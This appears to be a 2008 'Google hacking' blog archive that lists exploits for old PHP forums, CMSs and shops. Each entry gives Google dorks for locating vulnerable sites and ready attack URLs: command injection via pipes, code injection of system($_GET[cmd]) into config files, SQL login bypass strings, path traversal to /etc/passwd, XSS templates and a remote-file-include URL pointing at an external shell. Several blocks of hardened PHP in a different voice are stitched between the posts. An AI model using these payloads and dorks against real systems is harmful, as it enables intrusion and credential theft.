GOOGLE HACKING TRICKS, LEARN SECRETS OF HACKING



Archive for August 2008

MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB) <= 1.00 RC4.
Related advisory: Patch: http://www.mybboard.com/community/showthread.php?tid=2559
http://fain182.badroot.org
http://www.codebug.org
Discovered by Alberto Trivero and coded with FAiN182.
More details: http://www.milw0rm.com/id.php?id=1022

Description of Vulnerabilities
Multiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information. If the "/flatnuke/foot_news.php" script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation. [..] User-supplied input passed to the "image" parameter in the "thumb.php" script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path. It is also possible to disclose the system path by accessing certain scripts directly or with specially formed parameters.

i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals. http://www.packetstormsecurity.org/0506-exploits/igallery33.txt

Another PHP vulnerability, as seen here: http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.php
phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
This exploit gives the user all the details about the database connection such as database host, username, password and database name.

Blog Torrent is free, open-source software that provides a way to share large files on your website.
vulnerability: free access to the password file http://[target]/[path_of_blog]/data/newusers
advisory: http://www.securitytracker.com/alerts/2005/Jul/1014449.html
All current versions could be vulnerable depending on directory permissions.

Google Search : intitle:"blog torrent upload"

Vulnerability in EPay systems PHP code including http://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwd
advisory: http://www.cyberlords.net/advisories/cl_epay.txt
EPay Pro version 2.0 is vulnerable to this issue.

Zorum 3.5 remote code execution poc exploit
software: description: Zorum is a freely available, open source Web-based forum application implemented in PHP. It is available for UNIX, Linux, and any other platform that supports PHP script execution.
author site: http://zorum.phpoutsourcing.com/
1) remote code execution: vulnerable code, in /gorum/prod.php file:
    $doubleApp = isset($argv[1]);
    …
    if( $doubleApp )
    {
        $appDir = $argv[1];
        system("mkdir $prodDir/$appDir");
    …
a user can execute arbitrary commands using pipe char, example:
http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la to list directories
http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php to see database username/password…
http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd to see /etc/passwd file
2) path disclosure:
http://[target]/zorum/gorum/notification.php
http://[target]/zorum/user.php
http://[target]/zorum/attach.php
http://[target]/zorum/blacklist.php
http://[target]/zorum/forum.php
http://[target]/zorum/globalstat.php
http://[target]/zorum/gorum/trace.php
http://[target]/zorum/gorum/badwords.php
http://[target]/zorum/gorum/flood.php
and so on…
googledork: "Powered by Zorum 3.5"
rgod site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/zorum.html
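
The prod.php snippet above passes a request-controlled value straight into system(). The following is an added example, not Zorum's code, showing the same directory-creation step done without a shell and with an allowlist on the name; the function names and the "app" parameter are assumptions.

```php
<?php
// Added example (not Zorum project code): hardening the prod.php pattern
// quoted above. Function names and the "app" parameter are assumptions.

declare(strict_types=1);

// The pattern from the advisory, kept only as the "before" for comparison:
//   $appDir = $argv[1];
//   system("mkdir $prodDir/$appDir");
// With register_globals on, $argv[1] is attacker controlled via the query
// string, and a shell metacharacter turns mkdir into arbitrary execution.

/**
 * Create $prodDir/$name without touching a shell.
 * Returns the created path, or throws on invalid input.
 */
function createAppDir(string $prodDir, string $name): string
{
    // Strict allowlist: letters, digits, underscore, hyphen; no dots, slashes,
    // whitespace or shell metacharacters, bounded length.
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $name)) {
        throw new InvalidArgumentException('invalid application name');
    }
    $base = realpath($prodDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('product directory missing');
    }
    $target = $base . DIRECTORY_SEPARATOR . $name;
    // mkdir() is a filesystem call, not a shell command, so no metacharacter
    // interpretation happens even if the validation above were loosened later.
    if (!@mkdir($target, 0750) && !is_dir($target)) {
        throw new RuntimeException('could not create directory');
    }
    return $target;
}

// Read the name explicitly from the request instead of relying on
// register_globals (assumed parameter name "app").
function appNameFromRequest(array $get): string
{
    return isset($get['app']) && is_string($get['app']) ? $get['app'] : '';
}

// Constructed self-check against a temporary product directory.
$prod = sys_get_temp_dir() . '/prod_' . bin2hex(random_bytes(4));
mkdir($prod);
foreach (['myapp', '|ls -la', '../escape', 'a;b'] as $candidate) {
    try {
        $path = createAppDir($prod, $candidate);
        echo "created: $path\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . json_encode($candidate) . "\n";
    }
}
```

Only "myapp" is created; the three names carrying a pipe, a traversal or a semicolon are rejected before any filesystem call, and even a name that slipped through could not reach a shell.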

Looking Glass v20040427 arbitrary commands execution / cross site scripting.
description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers.
site: http://de-neef.net/articles.php?id=2&page=1
download page: http://de-neef.net/download.php?file=2
Read the full report here: http://rgod.altervista.org/lookingglass.html

Google Search : intitle:"Looking Glass v20040427" "When verifying

phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure, remote code execution, cross site scripting
software: author site: http://phpldapadmin.sourceforge.net/
description: phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server.
If unpatched and vulnerable, a user can see any file on the target system. A user can also execute arbitrary PHP code and system commands, or craft a malicious URL to include malicious client-side code that will be executed in the security context of the victim's browser.

Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

rgod advises: Cyber-Cats ChitCHat 2.0 permits cross site scripting attacks, lets users launch exploits from it, lets remote users obtain information on target users, and lets users insecurely delete/create files. This search does not find vulnerable versions, only generic.
software: site: http://www.cyber-cats.com/php/
rgod site: http://rgod.altervista.org
mail: retrogod@aliceposta.it

phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting
This search does not narrow to vulnerable versions.
software: site: http://open.appideas.com
download: http://open.appideas.com/Calendar/
original advisory: http://rgod.altervista.org/phpccal.html

MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution / cross site scripting / path disclosure. This search does not find vulnerable versions.
software: site: http://www.maxdev.com/
description: http://www.maxdev.com/AboutMD.phtml
original advisory: http://rgod.altervista.org/maxdev1073.html

my advisory: [quote]
PBLang 4.65 (possibly prior versions) remote code execution / administrative credentials disclosure / system information disclosure / cross site scripting / path disclosure
software: description: PBLang is a powerful flatfile Bulletin Board System. It combines many features of a professional board, but does not even require SQL support. It is completely based on text-file.
site: http://pblang.drmartinus.de/
download: https://sourceforge.net/project/showfiles.php?group_id=62953
1) system disclosure: you can traverse directories and see any file (if not .php or .php3 etc.) and include any file on target system using '../' chars and null byte (), example:
http://[target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd
vulnerable code in setcookie.php:
    …
    $usrname=$HTTP_GET_VARS['u'];
    @include($dbpath.'/'.$usrname.'temp');
    …
2) remote code execution: board stores data in files, when you register a [username] file without extension is created in /db/members directory, inside we have php code executed when you login, so in location field type:
    madrid"; system($HTTP_POST_VARS[cmd]); echo "
in /db/members/[username] file we have
    …
    $userlocation="madrid"; system($HTTP_GET_VARS[cmd]); echo "";
    …
no way to access the script directly, /db/members is .htaccess protected and extra lines are deleted from files after you login, so you should make all in a POST request and re-register. This is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum: http://rgod.altervista.org/pblang465.html
3) admin/user credentials disclosure: you can see password hash of any user or admin sending the command: cat ./db/members/[username]
4) cross site scripting: register and in location field type: madrid"; echo "alert(document.cookie)
then check this url: http://[target]/[path]/setcookie.php?u=[username]
5) path disclosure: http://[target]/[path]/setcookie.php?u=
googledork: "Software PBLang" filetype:php
rgod site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/pblang465.html
[/quote]

class-1 Forum Software v 0.24.4 Remote code execution
software: site: http://www.class1web.co.uk/software
description: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributed under the GNU General Public License which means that its source is freely-distributed and available to the general public.
vulnerability: the way the forum checks attachment extensions… look at the vulnerable code at viewforum.php lines 256-272. Nothing seems so strange, but… what happens if you try to upload a file with this name?
    shell.php.' or 'a' ='a
;) [1] SQL INJECTION! The query and other queries like this become:
    SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'
you have bypassed the check… now an executable file is uploaded, because for Apache, both on Windows and Linux a file with that name is an executable php file… you can download a poc file from my site, at url: http://rgod.altervista.org/shell.zip inside we have:
you can do the test manually: unzip the file, register, login, post this file as attachment, then go to this url to see the directory where the attachment has been uploaded: http://[target]/[path]/viewattach.php
you will be redirected to: http://[target]/[path]/[upload_dir]/
then launch commands:
http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwd to see /etc/passwd file
http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.inc to see database username and password
and so on… you can see my poc exploit at this url: http://www.rgod.altervista.org/class1.html
googledork: "Powered by and copyright class-1"
rgod site: http://rgod.altervista.org
mail: retrogod [at] aliceposta . it
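
Two defects combine in the class-1 check above: the extension is interpolated into the query, and the client's filename (with its several dots) is used as the stored name, which Apache's mod_mime then treats as PHP. The block below is an added example, not class-1 code; it binds the extension as a parameter and stores the file under a server-chosen name with a single extension. It uses an in-memory SQLite database through PDO (assumed available) to stand in for the extensions table, and the table and column names are assumptions.

```php
<?php
// Added example (not class-1 Forum code): parameterised attachment extension
// check plus a server-chosen stored filename. PDO/SQLite, the table layout and
// the function names are assumptions.

declare(strict_types=1);

function setupExtensionsTable(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE extensions (extension TEXT NOT NULL, file_type TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO extensions (extension, file_type) VALUES (?, ?)');
    foreach ([['jpg', 'Image'], ['png', 'Image'], ['gif', 'Image']] as $row) {
        $ins->execute($row);
    }
    return $db;
}

/**
 * Return the permitted extension for $uploadName, or null if it is not allowed.
 * The extension travels as a bound parameter, so quote characters in the
 * filename are data, never SQL. The original check interpolated it into the
 * query text, which the "shell.php.' or 'a'='a" name exploited.
 */
function allowedExtension(PDO $db, string $uploadName, string $fileType): ?string
{
    $ext = strtolower(pathinfo($uploadName, PATHINFO_EXTENSION));
    // A real extension is short and alphanumeric; anything else is refused
    // before the database is consulted.
    if ($ext === '' || !preg_match('/^[a-z0-9]{1,5}$/', $ext)) {
        return null;
    }
    $stmt = $db->prepare('SELECT extension FROM extensions WHERE extension = ? AND file_type = ?');
    $stmt->execute([$ext, $fileType]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['extension'] : null;
}

/**
 * Name the file is stored under: a random stem plus the single validated
 * extension. The client-supplied name is discarded entirely, so a multi-dot
 * name can never reach a web-served directory and be matched by mod_mime.
 */
function storedName(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed samples, including the injection name from the advisory.
$db = setupExtensionsTable();
$samples = [
    'photo.jpg',
    "shell.php.' or 'a' ='a",
    'archive.tar.gz',
    'notes.PNG',
];
foreach ($samples as $name) {
    $ext = allowedExtension($db, $name, 'Image');
    echo json_encode($name) . ' => '
        . ($ext === null ? 'rejected' : 'stored as ' . storedName($ext)) . "\n";
}
```

"photo.jpg" and "notes.PNG" are accepted and renamed; the injection name fails the extension pattern before any query runs, and "archive.tar.gz" is refused because "gz" is not an Image extension in the table.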

AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution
software: site: http://www.azdg.com/
download page: http://www.azdg.com/scripts.php?l=english
description: "AzDGDatingLite is a Free dating script working on PHP and MySQL. Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable" etc.
vulnerability: look at the vulnerable code in ./include/security.inc.php at lines ~80-90
    …
    else {
    if (isset($l) && file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') {
        include_once C_PATH.'/languages/'.$l.'/'.$l.'.php';
        include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php';
    }
    …
you can include an arbitrary file on the server using "../" and null byte () (to truncate the path to the filename you choose), example:
http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]
at the beginning of the script we have: @ob_start(); look at the php ob_start man page: "This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer." However, this is not a secure way to protect a script: the buffer is never shown, so you cannot see arbitrary files from the target machine this time… but you can execute arbitrary commands and after that see any file :) : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: temp.txt'); ?> usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext]; azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions, which you cannot calculate, but you can retrieve the filename from azdg pages when the file is shown on screen (!), so you can do this:
http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]&cmd=cat%20/etc/passwd
the output will be redirected to ./include/temp.txt so you make a GET request of this file and you have the /etc/passwd file. you can find my poc exploit at this url: http://rgod.altervista.org/azdg.html

Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. http://secunia.com/advisories/16878/

There is a script injection vuln for all versions. http://www.securityfocus.com/bid/14668

Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. http://secunia.com/product/4356/ http://www.packetalarm.com/sec_notices/index.php?id=2209&delimit=1#detail

Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution
software site: http://www.digital-scribe.org/
description: "Teachers have full control through a web-based interface. Designed for easy installation and even easier use, the Digital Scribe has been used in thousands of schools. No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system.
rgod site: http://rgod.altervista.org
email: retrogod at aliceposta it

PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scripting
rgod site: http://rgod.altervista.org
mail: retrogod at aliceposta it

Google Search: "Powered by PHP Advanced Transfer Manager v1.30"

CuteNews 1.4.0 (possibly prior versions) remote code execution
software site: http://cutephp.com/
description: "Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection …"
rgod site: http://rgod.altervista.org
mail: retrogod [at] aliceposta it

Google Search: "Powered by CuteNews"

There is an (adduser) remote denial of service vulnerability in version 0.95.

Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system. http://www.securityfocus.com/bid/14817/exploit

AutoLinksPro is a linking solution. AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.
Remote PHP File Include Vulnerability: http://www.securityfocus.com/archive/1/409529/30/120/threaded

cosmoshop is a commercial shop system written as a CGI.
vulnerabilities: sql injection, passwords saved in cleartext, view any file
http://www.securityfocus.com/archive/1/409510/30/120/threaded

It’s an exact replica of vbulletin but it is free. SQL-Injection Exploit: http://www.governmentsecurity.org/archive/t14850.html

PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.
PHP TopSites Discloses Configuration Data to Remote Users: http://www.securitytracker.com/alerts/2005/Jul/1014552.html
PS: all versions are vulnerable at time of writing.

Lucid CMS 1.0.11 SQL Injection / Login bypass
this is the dork for the version I tested: "Powered By: lucidCMS 1.0.11"
advisory/poc exploit: http://rgod.altervista.org/lucidcms1011.html
we have an XSS too: http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt

Cross site scripting and SQL injection vulnerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. Vulnerability report at http://search.securityfocus.com/archive/1/411591/30/0/threaded

Utopia News Pro 1.1.3 (and prior versions) SQL Injection & XSS
advisory & poc exploit: http://rgod.altervista.org/utopia113.html

Cyphor 0.19 (possibly prior versions) SQL Injection / Board takeover / cross site scripting
my advisory & poc exploit: http://rgod.altervista.org/cyphor019.html
rgod
Moderator PS: The software is no longer maintained.

versatileBulletinBoard V1.0.0 RC2 (possibly prior versions) multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosure
advisory: http://rgod.altervista.org/versatile100RC2.html

XOOPS 2.2.3 Arbitrary local file inclusion. This is a generic dork for the version I tested.
advisory & poc exploit: http://rgod.altervista.org/xoops_xpl.html

XOOPS WF_Downloads (2.05) module SQL injection. This is a specific dork that searches XOOPS sites with the WF_Downloads module installed.
advisory & poc exploit: http://rgod.altervista.org/xoops_xpl.html

http://www.google.com/search?hl=it&q=%22This+website+was+created+with+phpWebThings+1.4%22+&btnG=Cerca+con+Google&meta=
"This website was created with phpWebThings 1.4"
this is the Secunia advisory: http://secunia.com/advisories/17410/
and my exploit that shows a new vulnerability in the "msg" parameter: http://rgod.altervista.org/phpwebth14_xpl.html

This dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit: http://rgod.altervista.org/mambo452_xpl.html

dork: "Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)
this is a very old vulnerability discovered by Xanthic, can't find it in GHDB and I am surprised at how it still works… register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and… boom! You see the Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it
and I have remote commands xctn for this now, edit site title with this code:
    Ultimate PHP Board"; error_reporting(0); ini_set("max_execution_time",0); system($_GET[cmd]); echo "
now in config.dat we have:
    …
    $title="Ultimate PHP Board "; error_reporting(0); ini_set("max_execution_time",0); system($_GET[cmd]); echo " ";
    …
in header.php we have:
    …
    include "./db/config.dat";
    …
so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd

Guppy <= 4.5.9 $REMOTE_ADDR overwrite -> remote code execution / various arbitrary inclusion issues advisory & poc exploit: http://rgod.altervista.org/guppy459_xpl.html

Xaraya <=1.0.0 RC4 Denial of Service
explanation: http://rgod.altervista.org/xarayaDOS.html
exploit: http://rgod.altervista.org/xarayaDOS_xpl.html

This is the dork for PhpX <= 3.5.9 Sql injection /login bypass vulnerability advisory & poc exploit: http://rgod.altervista.org/phpx_359_xpl.html

Advisory & poc exploit: http://rgod.altervista.org/docebo204_xpl.html

this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit: http://rgod.altervista.org/sugar_suite_40beta.html

PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure
advisory: http://rgod.altervista.org/phpcoin122.html
more generic: "Powered By phpCOIN" to see previous versions (not tested)

Vulnerability Description
SimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Products:
* SimpleMedia SimpleBBS 1.1 Affected
Vulnerability classification:
* Remote vulnerability
* Input manipulation attack
* Impact on integrity
* Exploit unavailable
* Verified
More info on Vuln: http://www.securityfocus.com/bid/15594

this is the dork for Limbo Cms <= 1.0.4.2 _SERVER[] overwrite / remote code execution advisory & poc exploit: http://rgod.altervista.org/limbo1042_xpl.html

CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398
Moderator note: "Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke"

PHPGedView <=3.3.7 remote code execution advisory & poc exploit: http://rgod.altervista.org/phpgedview_337_xpl.html

Gtchat install file. You can disable the chat program or change the language without an admin username or password. You can also point the chatroom information to a different URL, in theory using a cross-site script to take over the chatroom.

"index of" intext:fckeditor inurl:fckeditor
this dork is for the FCKEditor script; through the editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious content on the target machine, including php code, and launch commands… however if you do not succeed in executing the shell, FCKEditor is integrated in a lot of applications, so you can check for a local inclusion issue inside them… this tool makes the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html

this is for Linpha <=1.0 arbitrary local inclusion: http://retrogod.altervista.org/linpha_10_local.html
intext:"LinPHA Version" intext:"Have fun" to see the version in the description
in the Linpha 0.9 branch there is also sql injection through cookies to bypass admin login, search for the exploit

intitle:admbook intitle:version filetype:php
tested version: 1.2.2, you can inject php code in config-data.php and execute commands on the target through the X-Forwarded-For http header when you post a message; also you can see phpinfo(): http://[target]/[path]/admin/info.php
perl exploit: http://retrogod.altervista.org/admbook_122_xpl.html
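
The UPB config.dat issue above and this Admbook config-data.php issue share one root cause: a request-controlled string (a site title, an X-Forwarded-For header) is pasted raw into a file that PHP later include()s, so a quote character ends the string literal and whatever follows runs as code. The block below is an added example, not UPB or Admbook code, showing how to persist such values as data rather than as source, and how to take a client address for logging without trusting header text. The file and key names and the trusted-proxy list are assumptions.

```php
<?php
// Added example (not UPB or Admbook code): storing user-supplied settings and
// a client address without turning request text into executable PHP. File and
// key names and the trusted-proxy list are assumptions.

declare(strict_types=1);

/**
 * Serialise $settings with var_export(), which emits a PHP array literal with
 * every string quoted and escaped. A quote or semicolon inside a value stays
 * inside the string; it cannot close the literal and start a statement the
 * way raw concatenation into config.dat allowed.
 */
function writeConfig(string $path, array $settings): void
{
    foreach ($settings as $k => $v) {
        if (!is_string($v) && !is_int($v) && !is_bool($v)) {
            throw new InvalidArgumentException("unsupported value for $k");
        }
    }
    $php = "<?php\nreturn " . var_export($settings, true) . ";\n";
    // Write to a temp file and rename so a half-written file is never included.
    $tmp = $path . '.tmp';
    file_put_contents($tmp, $php, LOCK_EX);
    rename($tmp, $path);
}

function readConfig(string $path): array
{
    $settings = include $path;
    return is_array($settings) ? $settings : [];
}

/**
 * Client address for logging: use the socket peer. Honour X-Forwarded-For
 * only when the peer is a trusted proxy, and then keep the value only if it
 * parses as an IP address, so arbitrary header text never reaches a file.
 */
function clientIp(array $server, array $trustedProxies): string
{
    $peer = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    if (in_array($peer, $trustedProxies, true) && isset($server['HTTP_X_FORWARDED_FOR'])) {
        $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $peer;
}

// Constructed demonstration: a title shaped like the quote-breaking payload
// from the UPB post (without a command), round-tripped through the config.
$cfg = sys_get_temp_dir() . '/config_' . bin2hex(random_bytes(4)) . '.php';
$hostileTitle = 'Ultimate PHP Board"; /* hostile */ echo "injected';
writeConfig($cfg, ['title' => $hostileTitle, 'posts_per_page' => 20]);
$loaded = readConfig($cfg);
echo 'title stored as data, unchanged: ' . var_export($loaded['title'] === $hostileTitle, true) . "\n";
unlink($cfg);

// A forwarded header that is not an IP is discarded even from a trusted proxy.
$fake = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '"; echo "injected'];
echo 'client ip: ' . clientIp($fake, ['10.0.0.5']) . "\n";   // 10.0.0.5
$good = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '203.0.113.7, 10.0.0.5'];
echo 'client ip: ' . clientIp($good, ['10.0.0.5']) . "\n";   // 203.0.113.7
```

The same principle applies to any flat-file board: if a value must be written to disk, write it with a serialiser (var_export, json_encode) or into a data file that is parsed, never into a file that is included as code.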

a cgi-bin executables xss/html injection miscellanea: some examples:
inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=">[XSS HERE]
inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=">[XSS HERE]
inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=">[XSS HERE]&poi1city=city&poi1state=OK
inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes
inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=">[XSS HERE]
inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=">[XSS HERE]&WIT_oid=what::what::1111&m=1&d=
inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=">[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit
inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=">[XSS HERE]
inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=">[XSS HERE]
inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=">[XSS HERE]&LIMIT=50&YEAR=">
inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=">[XSS HERE]
inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html][XSS HERE]&page=1
inurl:webstat.exe ext:exe inurl:/*cgi*/ http://[target]/[path]/webstat.exe?A=X&RA=[XSS HERE]

this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me: advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html

Google Search: "powered by phplist" | inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe" -ubbi -bugs +phplist -tincan.co.uk

Active PHP Bookmarks, a web based bookmark manager, was originally developed by Brandon Stone. Due to lack of time he has withdrawn himself from the project, however keeping his development forum on-line. On December 3rd 2004 this APB-forum, which was still the home of a small but relatively active community, was compromised. All content of the forum was lost, including links to important user contributed patches for the APB code.
exploit (I haven't tested it): http://www.securityfocus.com/archive/1/305392
my version of the exploit: http://fr0zen.no-ip.org/apbn-0.2.5_remote_incl_xpl.phps

forums powered by ubbthreads are vulnerable to file inclusion. You can get more results with yahoo search. http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt? http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded

The EarlyImpact Productcart contains multiple vulnerabilities, which could be exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more information. Also see http://www.securityfocus.com/bid/9677 for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.

Google Search: inurl:custva.asp

According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allows an attacker to execute commands on the server.

Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. From there, hit "Admin" then do the following: leave the username field blank. For the password, enter this exactly: ') OR ('a' = 'a
You are now in the Guestbook's Admin section. http://www.securityfocus.com/bid/10209

VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything. According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site. The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:"VP-ASP Shopping Cart *" -"5.0" to find unpatched servers.

vBulletin is a customizable forums package for web sites. It has been written in PHP and is complemented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not in the Edit panel. Malicious code can be injected by an attacker through this flaw. More information at http://www.securityfocus.com/bid/10612/.

Google Search: "Powered by: vBulletin * 3.0.1" inurl:newreply.php

